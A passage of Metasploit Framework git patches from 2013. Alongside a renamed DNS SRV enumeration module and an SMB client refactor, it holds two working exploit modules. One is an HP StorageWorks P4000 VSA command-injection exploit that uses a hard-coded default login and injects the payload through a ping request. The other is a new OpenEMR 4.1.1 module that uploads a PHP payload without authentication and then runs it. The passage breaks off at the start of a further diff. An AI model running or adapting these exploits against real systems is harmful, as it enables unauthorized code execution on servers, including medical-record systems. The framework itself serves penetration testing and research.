rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record end end return results From d1ba8604099e7ebf8c6951aa4ea745e1e8daa860 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 16:20:33 +0100 Subject: [PATCH 401/421] changing filename for dns_srv --- modules/auxiliary/gather/dns_srv.rb | 227 ---------------------------- 1 file changed, 227 deletions(-) delete mode 100644 modules/auxiliary/gather/dns_srv.rb diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb deleted file mode 100644 index aeb3eef1c5c1..000000000000 --- a/modules/auxiliary/gather/dns_srv.rb +++ /dev/null @@ -1,227 +0,0 @@ -## -# ## This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' -require "net/dns/resolver" -require 'rex' - -class Metasploit3 < Msf::Auxiliary - include Msf::Auxiliary::Report - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'DNS Common Service Record Enumeration', - 'Description' => %q{ - This module enumerates common DNS service records in a given domain. By setting - the ALL_DNS to true, all the name servers of a given domain are used for - enumeration. Otherwise only the system dns is used for enumration. in order to get - all the available name servers for the given domain the SOA and NS records are - queried. In order to convert from domain names to IP addresses queries for A and - AAAA (IPv6) records are used. - }, - 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], - 'License' => BSD_LICENSE - )) - - register_options( - [ - OptString.new('DOMAIN', [ true, "The target domain name."]), - OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]) - ], self.class) - - register_advanced_options( - [ - OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 2]), - OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]) - ], self.class) - end - - def run - records = [] - @res = Net::DNS::Resolver.new() - if datastore['RETRY'] - @res.retry = datastore['RETRY'].to_i - end - - if datastore['RETRY_INTERVAL'] - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i - end - - print_status("Enumerating SRV Records for #{datastore['DOMAIN']}") - records = records + srvqry(datastore['DOMAIN']) - if datastore["ALL_NS"] - get_soa(datastore['DOMAIN']).each do |s| - switchdns(s[:address]) - records = records + srvqry(datastore['DOMAIN']) - end - get_ns(datastore['DOMAIN']).each do |ns| - switchdns(ns[:address]) - records =records + srvqry(datastore['DOMAIN']) - end - end - records.uniq! - records.each do |r| - print_good("Host: #{r[:host]} IP: #{r[:address].to_s} Service: #{r[:service]} Protocol: #{r[:proto]} Port: #{r[:port]}") - report_host( - :host => r[:address].to_s, - :name => r[:host] - ) - report_service( - :host=> r[:address].to_s, - :port => r[:port].to_i, - :proto => r[:proto], - :name => r[:service], - :host_name => r[:host] - ) - end - - end - - def get_soa(target) - results = [] - query = @res.query(target, "SOA") - return results if not query - (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| - if Rex::Socket.dotted_ip?(rr.mname) - record = {} - record[:host] = rr.mname - record[:type] = "SOA" - record[:address] = rr.mname - results << record - else - get_ip(rr.mname).each do |ip| - record = {} - record[:host] = rr.mname.gsub(/\.$/,'') - record[:type] = "SOA" - record[:address] = ip[:address].to_s - results << record - end - end - end - return results - end - - def srvqry(dom) - results = [] - #Most common SRV Records - srvrcd = [ - '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', - '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', - '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', - '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', - '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', - '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', - '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', - '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', - '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', - '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', - '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', - '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', - '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', - '_ldap._tcp.ForestDNSZones.', '_ldap._tcp.dc._msdcs.', '_ldap._tcp.pdc._msdcs.', - '_ldap._tcp.gc._msdcs.','_kerberos._tcp.dc._msdcs.','_kpasswd._tcp.','_kpasswd._udp.' - ] - - srvrcd.each do |srvt| - trg = "#{srvt}#{dom}" - begin - - query = @res.query(trg , Net::DNS::SRV) - next unless query - query.answer.each do |srv| - if Rex::Socket.dotted_ip?(srv.host) - record = {} - srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] - record[:host] = srv.host.gsub(/\.$/,'') - record[:type] = "SRV" - record[:address] = srv.host - record[:srv] = srvt - record[:service] = srv_info[0] - record[:proto] = srv_info[1] - record[:port] = srv.port - record[:priority] = srv.priority - results << record - vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") - else - get_ip(srv.host.gsub(/\.$/,'')).each do |ip| - record = {} - srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] - record[:host] = srv.host.gsub(/\.$/,'') - record[:type] = "SRV" - record[:address] = ip[:address] - record[:srv] = srvt - record[:service] = srv_info[0] - record[:proto] = srv_info[1] - record[:port] = srv.port - record[:priority] = srv.priority - results << record - vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") - end - end - end - rescue - end - end - return results - end - - def get_ip(host) - results = [] - query = @res.search(host, "A") - if (query) - query.answer.each do |rr| - if rr.type == "CNAME" - results = results + get_ip(rr.cname) - else - record = {} - record[:host] = host - record[:type] = "AAAA" - record[:address] = rr.address.to_s - results << record - end - end - end - query1 = @res.search(host, "AAAA") - if (query1) - query1.answer.each do |rr| - if rr.type == "CNAME" - results = results + get_ip(rr.cname) - else - record = {} - record[:host] = host - record[:type] = "AAAA" - record[:address] = rr.address.to_s - results << record - end - end - end - return results - end - - def switchdns(ns) - vprint_status("Enumerating SRV Records on: #{ns}") - @res.nameserver=(ns) - @nsinuse = ns - end - - def get_ns(target) - results = [] - query = @res.query(target, "NS") - return results if not query - (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| - get_ip(rr.nsdname).each do |r| - record = {} - record[:host] = rr.nsdname.gsub(/\.$/,'') - record[:type] = "NS" - record[:address] = r[:address].to_s - results << record - end - end - return results - end -end - From 829cf0f076d1398518a73cf6de38923ee20ac6a6 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 16:20:55 +0100 Subject: [PATCH 402/421] name changed to dns_srv_enum --- modules/auxiliary/gather/dns_srv_enum.rb | 227 +++++++++++++++++++++++ 1 file changed, 227 insertions(+) create mode 100644 modules/auxiliary/gather/dns_srv_enum.rb diff --git a/modules/auxiliary/gather/dns_srv_enum.rb b/modules/auxiliary/gather/dns_srv_enum.rb new file mode 100644 index 000000000000..aeb3eef1c5c1 --- /dev/null +++ b/modules/auxiliary/gather/dns_srv_enum.rb @@ -0,0 +1,227 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Common Service Record Enumeration', + 'Description' => %q{ + This module enumerates common DNS service records in a given domain. By setting + the ALL_DNS to true, all the name servers of a given domain are used for + enumeration. Otherwise only the system dns is used for enumration. in order to get + all the available name servers for the given domain the SOA and NS records are + queried. In order to convert from domain names to IP addresses queries for A and + AAAA (IPv6) records are used. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptString.new('DOMAIN', [ true, "The target domain name."]), + OptBool.new( 'ALL_NS', [ false, "Run against all name servers for the given domain.",false]) + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received.", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry.", 2]) + ], self.class) + end + + def run + records = [] + @res = Net::DNS::Resolver.new() + if datastore['RETRY'] + @res.retry = datastore['RETRY'].to_i + end + + if datastore['RETRY_INTERVAL'] + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + end + + print_status("Enumerating SRV Records for #{datastore['DOMAIN']}") + records = records + srvqry(datastore['DOMAIN']) + if datastore["ALL_NS"] + get_soa(datastore['DOMAIN']).each do |s| + switchdns(s[:address]) + records = records + srvqry(datastore['DOMAIN']) + end + get_ns(datastore['DOMAIN']).each do |ns| + switchdns(ns[:address]) + records =records + srvqry(datastore['DOMAIN']) + end + end + records.uniq! + records.each do |r| + print_good("Host: #{r[:host]} IP: #{r[:address].to_s} Service: #{r[:service]} Protocol: #{r[:proto]} Port: #{r[:port]}") + report_host( + :host => r[:address].to_s, + :name => r[:host] + ) + report_service( + :host=> r[:address].to_s, + :port => r[:port].to_i, + :proto => r[:proto], + :name => r[:service], + :host_name => r[:host] + ) + end + + end + + def get_soa(target) + results = [] + query = @res.query(target, "SOA") + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::SOA}).each do |rr| + if Rex::Socket.dotted_ip?(rr.mname) + record = {} + record[:host] = rr.mname + record[:type] = "SOA" + record[:address] = rr.mname + results << record + else + get_ip(rr.mname).each do |ip| + record = {} + record[:host] = rr.mname.gsub(/\.$/,'') + record[:type] = "SOA" + record[:address] = ip[:address].to_s + results << record + end + end + end + return results + end + + def srvqry(dom) + results = [] + #Most common SRV Records + srvrcd = [ + '_gc._tcp.', '_kerberos._tcp.', '_kerberos._udp.', '_ldap._tcp.', + '_test._tcp.', '_sips._tcp.', '_sip._udp.', '_sip._tcp.', '_aix._tcp.', + '_aix._tcp.', '_finger._tcp.', '_ftp._tcp.', '_http._tcp.', '_nntp._tcp.', + '_telnet._tcp.', '_whois._tcp.', '_h323cs._tcp.', '_h323cs._udp.', + '_h323be._tcp.', '_h323be._udp.', '_h323ls._tcp.', + '_h323ls._udp.', '_sipinternal._tcp.', '_sipinternaltls._tcp.', + '_sip._tls.', '_sipfederationtls._tcp.', '_jabber._tcp.', + '_xmpp-server._tcp.', '_xmpp-client._tcp.', '_imap.tcp.', + '_certificates._tcp.', '_crls._tcp.', '_pgpkeys._tcp.', + '_pgprevokations._tcp.', '_cmp._tcp.', '_svcp._tcp.', '_crl._tcp.', + '_ocsp._tcp.', '_PKIXREP._tcp.', '_smtp._tcp.', '_hkp._tcp.', + '_hkps._tcp.', '_jabber._udp.','_xmpp-server._udp.', '_xmpp-client._udp.', + '_jabber-client._tcp.', '_jabber-client._udp.','_kerberos.tcp.dc._msdcs.', + '_ldap._tcp.ForestDNSZones.', '_ldap._tcp.dc._msdcs.', '_ldap._tcp.pdc._msdcs.', + '_ldap._tcp.gc._msdcs.','_kerberos._tcp.dc._msdcs.','_kpasswd._tcp.','_kpasswd._udp.' + ] + + srvrcd.each do |srvt| + trg = "#{srvt}#{dom}" + begin + + query = @res.query(trg , Net::DNS::SRV) + next unless query + query.answer.each do |srv| + if Rex::Socket.dotted_ip?(srv.host) + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = srv.host + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host.gsub(/\.$/,'')} IP: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") + else + get_ip(srv.host.gsub(/\.$/,'')).each do |ip| + record = {} + srv_info = srvt.scan(/^_(\S*)\._(tcp|udp)\./)[0] + record[:host] = srv.host.gsub(/\.$/,'') + record[:type] = "SRV" + record[:address] = ip[:address] + record[:srv] = srvt + record[:service] = srv_info[0] + record[:proto] = srv_info[1] + record[:port] = srv.port + record[:priority] = srv.priority + results << record + vprint_status("SRV Record: #{trg} Host: #{srv.host} IP: #{ip[:address]} Port: #{srv.port} Priority: #{srv.priority}") + end + end + end + rescue + end + end + return results + end + + def get_ip(host) + results = [] + query = @res.search(host, "A") + if (query) + query.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + query1 = @res.search(host, "AAAA") + if (query1) + query1.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + return results + end + + def switchdns(ns) + vprint_status("Enumerating SRV Records on: #{ns}") + @res.nameserver=(ns) + @nsinuse = ns + end + + def get_ns(target) + results = [] + query = @res.query(target, "NS") + return results if not query + (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |rr| + get_ip(rr.nsdname).each do |r| + record = {} + record[:host] = rr.nsdname.gsub(/\.$/,'') + record[:type] = "NS" + record[:address] = r[:address].to_s + results << record + end + end + return results + end +end + From 221ce22f53e9f80b6ecb4dcff28b817870413639 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 15 Feb 2013 19:01:58 +0100 Subject: [PATCH 403/421] make msftidy happy --- modules/exploits/multi/misc/hp_vsa_exec.rb | 51 ++++++++++++++++++---- 1 file changed, 43 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb index d9a7bbab08a1..b9aae48bdf6f 100644 --- a/modules/exploits/multi/misc/hp_vsa_exec.rb +++ b/modules/exploits/multi/misc/hp_vsa_exec.rb @@ -17,7 +17,7 @@ def initialize(info={}) 'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution", 'Description' => %q{ This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on - versions prior to 9.5. By using a default account credential, it is possible + versions prior to 9.5. By using a default account credential, it is possible to inject arbitrary commands as part of a ping request via port 13838. }, 'License' => MSF_LICENSE, @@ -50,9 +50,11 @@ def initialize(info={}) 'Arch' => ARCH_CMD, 'Targets' => [ - ['HP VSA prior to 9.5', {}] + [ 'Automatic', {} ], + [ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ], + [ 'HP VSA 9', { 'Version' => '9.0.0' } ] ], - 'Privileged' => false, + 'Privileged' => true, 'DisclosureDate' => "Nov 11 2011", 'DefaultTarget' => 0)) @@ -75,20 +77,53 @@ def generate_packet(data) pkt end + def get_target + if target.name !~ /Automatic/ + return target + end - def exploit - connect - - # Login packet - print_status("#{rhost}:#{rport} Sending login packet") + # Login at 8.5.0 packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"") + print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0") + sock.put(packet) + res = sock.get_once + vprint_status(Rex::Text.to_hex_dump(res)) if res + if res and res=~ /OK/ and res=~ /Login/ + return targets[1] + end + + # Login at 9.0.0 + packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"") + print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0") sock.put(packet) res = sock.get_once vprint_status(Rex::Text.to_hex_dump(res)) if res + if res and res=~ /OK/ and res =~ /Login/ + return targets[2] + end + + fail_with(Msf::Exploit::Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'") + end + + def exploit + connect + + if target.name =~ /Automatic/ + my_target = get_target + print_good("#{rhost}:#{rport} - Target #{my_target.name} found") + else + my_target = target + print_status("#{rhost}:#{rport} Sending login packet") + packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"") + sock.put(packet) + res = sock.get_once + vprint_status(Rex::Text.to_hex_dump(res)) if res + end # Command execution print_status("#{rhost}:#{rport} Sending injection") data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/" + data << "64/5/" if my_target.name =~ /9/ packet = generate_packet(data) sock.put(packet) res = sock.get_once From a19da61177097efeae07e2c5b72eec2cb2a772a2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sat, 16 Feb 2013 00:53:28 +0100 Subject: [PATCH 404/421] deleting trailing comma --- modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 4d18e2dc74d6..18c7eb70198a 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -36,7 +36,7 @@ def initialize 'References' => [ [ 'CVE', '2013-1625' ], - ], + ] ) register_options([Opt::RPORT(31001)], self.class) From 6b1bb9e1e8f3c31dbdc1a8e21b0cdd6a80de8c1b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sat, 16 Feb 2013 13:11:46 +0100 Subject: [PATCH 405/421] Added module for OSVDB 90222 --- .../unix/webapp/openemr_upload_exec.rb | 132 ++++++++++++++++++ 1 file changed, 132 insertions(+) create mode 100644 modules/exploits/unix/webapp/openemr_upload_exec.rb diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb new file mode 100644 index 000000000000..41957608bf8b --- /dev/null +++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb @@ -0,0 +1,132 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "OpenEMR PHP File Upload Vulnerability", + 'Description' => %q{ + This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the + ofc_upload_image.php file from the openflashchart library, a malicious user can + upload a file to the tmp-upload-images directory without any authentication, which + results in arbitrary code execution. The module has been tested successfully on + OpenEMR 4.1.1 over Ubuntu 10.04. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'OSVDB', '90222' ], + [ 'BID', '37314' ], + [ 'EBD', '24492' ], + [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ], + [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ] + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['OpenEMR 4.1.1', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Feb 13 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr']) + ], self.class) + end + + def check + uri = target_uri.path + peer = "#{rhost}:#{rport}" + + # Check version + print_status("#{peer} - Trying to detect installed version") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, "interface", "login", "login.php") + }) + + if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/ + version = $1 + else + return Exploit::CheckCode::Unknown + end + + print_status("#{peer} - Version #{version} detected") + + if version > "4.1.1" + return Exploit::CheckCode::Safe + end + + # Check for vulnerable component + print_status("#{peer} - Trying to detect the vulnerable component") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"), + }) + + if res and res.code == 200 and res.body =~ /Saving your image to/ + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + def exploit + uri = target_uri.path + + peer = "#{rhost}:#{rport}" + payload_name = rand_text_alpha(rand(10) + 5) + '.php' + my_payload = payload.encoded + + print_status("#{peer} - Sending PHP payload (#{payload_name})") + res = send_request_raw({ + 'method' => 'POST', + 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}", + 'headers' => { "Content-Length" => my_payload.length.to_s }, + 'data' => my_payload + }) + + # If the server returns 200 and the body contains our payload name, + # we assume we uploaded the malicious file successfully + if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/ + fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!") + end + + register_file_for_cleanup(payload_name) + + print_status("#{peer} - Executing PHP payload (#{payload_name})") + # Execute our payload + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name), + }) + + # If we don't get a 200 when we request our malicious payload, we suspect + # we don't have a shell, either. Print the status code for debugging purposes. + if res and res.code != 200 + print_error("#{peer} - Server returned #{res.code.to_s}") + end + end + +end From a902480576a904f464b43a365cd002c81361eaf6 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Sun, 17 Feb 2013 06:57:35 -0600 Subject: [PATCH 406/421] Break out subclasses into their own files --- lib/rex/proto/smb/simpleclient.rb | 154 +------------------- lib/rex/proto/smb/simpleclient/open_file.rb | 106 ++++++++++++++ lib/rex/proto/smb/simpleclient/open_pipe.rb | 57 ++++++++ 3 files changed, 168 insertions(+), 149 deletions(-) create mode 100644 lib/rex/proto/smb/simpleclient/open_file.rb create mode 100644 lib/rex/proto/smb/simpleclient/open_pipe.rb diff --git a/lib/rex/proto/smb/simpleclient.rb b/lib/rex/proto/smb/simpleclient.rb index 454a3c694e75..c0cd9d02e99f 100644 --- a/lib/rex/proto/smb/simpleclient.rb +++ b/lib/rex/proto/smb/simpleclient.rb @@ -12,6 +12,8 @@ class SimpleClient require 'rex/proto/smb/crypt' require 'rex/proto/smb/utils' require 'rex/proto/smb/client' +require 'rex/proto/smb/simpleclient/open_file' +require 'rex/proto/smb/simpleclient/open_pipe' # Some short-hand class aliases CONST = Rex::Proto::SMB::Constants @@ -20,157 +22,11 @@ class SimpleClient XCEPT = Rex::Proto::SMB::Exceptions EVADE = Rex::Proto::SMB::Evasions - - class OpenFile - attr_accessor :name, :tree_id, :file_id, :mode, :client, :chunk_size - - def initialize(client, name, tree_id, file_id) - self.client = client - self.name = name - self.tree_id = tree_id - self.file_id = file_id - self.chunk_size = 48000 - end - - def delete - begin - self.close - rescue - end - self.client.delete(self.name, self.tree_id) - end - - # Close this open file - def close - self.client.close(self.file_id, self.tree_id) - end - - # Read data from the file - def read(length = nil, offset = 0) - if (length == nil) - data = '' - fptr = offset - ok = self.client.read(self.file_id, fptr, self.chunk_size) - while (ok and ok['Payload'].v['DataLenLow'] > 0) - buff = ok.to_s.slice( - ok['Payload'].v['DataOffset'] + 4, - ok['Payload'].v['DataLenLow'] - ) - data << buff - if ok['Payload'].v['Remaining'] == 0 - break - end - fptr += ok['Payload'].v['DataLenLow'] - - begin - ok = self.client.read(self.file_id, fptr, self.chunk_size) - rescue XCEPT::ErrorCode => e - case e.error_code - when 0x00050001 - # Novell fires off an access denied error on EOF - ok = nil - else - raise e - end - end - end - - return data - else - ok = self.client.read(self.file_id, offset, length) - data = ok.to_s.slice( - ok['Payload'].v['DataOffset'] + 4, - ok['Payload'].v['DataLenLow'] - ) - return data - end - end - - def << (data) - self.write(data) - end - - # Write data to the file - def write(data, offset = 0) - # Track our offset into the remote file - fptr = offset - - # Duplicate the data so we can use slice! - data = data.dup - - # Take our first chunk of bytes - chunk = data.slice!(0, self.chunk_size) - - # Keep writing data until we run out - while (chunk.length > 0) - ok = self.client.write(self.file_id, fptr, chunk) - cl = ok['Payload'].v['CountLow'] - - # Partial write, push the failed data back into the queue - if (cl != chunk.length) - data = chunk.slice(cl - 1, chunk.length - cl) + data - end - - # Increment our painter and grab the next chunk - fptr += cl - chunk = data.slice!(0, self.chunk_size) - end - end - end - - class OpenPipe < OpenFile - - # Valid modes are: 'trans' and 'rw' - attr_accessor :mode - - def initialize(*args) - super(*args) - self.mode = 'rw' - @buff = '' - end - - def read_buffer(length, offset=0) - length ||= @buff.length - @buff.slice!(0, length) - end - - def read(length = nil, offset = 0) - case self.mode - when 'trans' - read_buffer(length, offset) - when 'rw' - super(length, offset) - else - raise ArgumentError - end - end - - def write(data, offset = 0) - case self.mode - - when 'trans' - write_trans(data, offset) - when 'rw' - super(data, offset) - else - raise ArgumentError - end - end - - def write_trans(data, offset=0) - ack = self.client.trans_named_pipe(self.file_id, data) - doff = ack['Payload'].v['DataOffset'] - dlen = ack['Payload'].v['DataCount'] - @buff << ack.to_s[4+doff, dlen] - end - end - - # Public accessors -attr_accessor :last_error +attr_accessor :last_error # Private accessors -attr_accessor :socket, :client, :direct, :shares, :last_share +attr_accessor :socket, :client, :direct, :shares, :last_share # Pass the socket object and a boolean indicating whether the socket is netbios or cifs def initialize(socket, direct = false) @@ -180,7 +36,7 @@ def initialize(socket, direct = false) self.shares = { } end - def login( name = '', user = '', pass = '', domain = '', + def login(name = '', user = '', pass = '', domain = '', verify_signature = false, usentlmv2 = false, usentlm2_session = true, send_lm = true, use_lanman_key = false, send_ntlm = true, native_os = 'Windows 2000 2195', native_lm = 'Windows 2000 5.0', spnopt = {}) diff --git a/lib/rex/proto/smb/simpleclient/open_file.rb b/lib/rex/proto/smb/simpleclient/open_file.rb new file mode 100644 index 000000000000..66696dfae43b --- /dev/null +++ b/lib/rex/proto/smb/simpleclient/open_file.rb @@ -0,0 +1,106 @@ +# -*- coding: binary -*- +module Rex +module Proto +module SMB +class SimpleClient + +class OpenFile + attr_accessor :name, :tree_id, :file_id, :mode, :client, :chunk_size + + def initialize(client, name, tree_id, file_id) + self.client = client + self.name = name + self.tree_id = tree_id + self.file_id = file_id + self.chunk_size = 48000 + end + + def delete + begin + self.close + rescue + end + self.client.delete(self.name, self.tree_id) + end + + # Close this open file + def close + self.client.close(self.file_id, self.tree_id) + end + + # Read data from the file + def read(length = nil, offset = 0) + if (length == nil) + data = '' + fptr = offset + ok = self.client.read(self.file_id, fptr, self.chunk_size) + while (ok and ok['Payload'].v['DataLenLow'] > 0) + buff = ok.to_s.slice( + ok['Payload'].v['DataOffset'] + 4, + ok['Payload'].v['DataLenLow'] + ) + data << buff + if ok['Payload'].v['Remaining'] == 0 + break + end + fptr += ok['Payload'].v['DataLenLow'] + + begin + ok = self.client.read(self.file_id, fptr, self.chunk_size) + rescue XCEPT::ErrorCode => e + case e.error_code + when 0x00050001 + # Novell fires off an access denied error on EOF + ok = nil + else + raise e + end + end + end + + return data + else + ok = self.client.read(self.file_id, offset, length) + data = ok.to_s.slice( + ok['Payload'].v['DataOffset'] + 4, + ok['Payload'].v['DataLenLow'] + ) + return data + end + end + + def << (data) + self.write(data) + end + + # Write data to the file + def write(data, offset = 0) + # Track our offset into the remote file + fptr = offset + + # Duplicate the data so we can use slice! + data = data.dup + + # Take our first chunk of bytes + chunk = data.slice!(0, self.chunk_size) + + # Keep writing data until we run out + while (chunk.length > 0) + ok = self.client.write(self.file_id, fptr, chunk) + cl = ok['Payload'].v['CountLow'] + + # Partial write, push the failed data back into the queue + if (cl != chunk.length) + data = chunk.slice(cl - 1, chunk.length - cl) + data + end + + # Increment our painter and grab the next chunk + fptr += cl + chunk = data.slice!(0, self.chunk_size) + end + end +end +end +end +end +end diff --git a/lib/rex/proto/smb/simpleclient/open_pipe.rb b/lib/rex/proto/smb/simpleclient/open_pipe.rb new file mode 100644 index 000000000000..387ee4ff9ab7 --- /dev/null +++ b/lib/rex/proto/smb/simpleclient/open_pipe.rb @@ -0,0 +1,57 @@ +# -*- coding: binary -*- + +module Rex +module Proto +module SMB +class SimpleClient + +class OpenPipe < OpenFile + + # Valid modes are: 'trans' and 'rw' + attr_accessor :mode + + def initialize(*args) + super(*args) + self.mode = 'rw' + @buff = '' + end + + def read_buffer(length, offset=0) + length ||= @buff.length + @buff.slice!(0, length) + end + + def read(length = nil, offset = 0) + case self.mode + when 'trans' + read_buffer(length, offset) + when 'rw' + super(length, offset) + else + raise ArgumentError + end + end + + def write(data, offset = 0) + case self.mode + + when 'trans' + write_trans(data, offset) + when 'rw' + super(data, offset) + else + raise ArgumentError + end + end + + def write_trans(data, offset=0) + ack = self.client.trans_named_pipe(self.file_id, data) + doff = ack['Payload'].v['DataOffset'] + dlen = ack['Payload'].v['DataCount'] + @buff << ack.to_s[4+doff, dlen] + end +end +end +end +end +end From a8d574e4ce0437f4a8d57ee1f47ea99067d55935 Mon Sep 17 00:00:00 2001 From: Thomas McCarthy <smilingraccoon@gmail.com> Date: Sun, 17 Feb 2013 14:08:33 -0500 Subject: [PATCH 407/421] Updated one print_status --- modules/exploits/windows/local/s4u_persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb 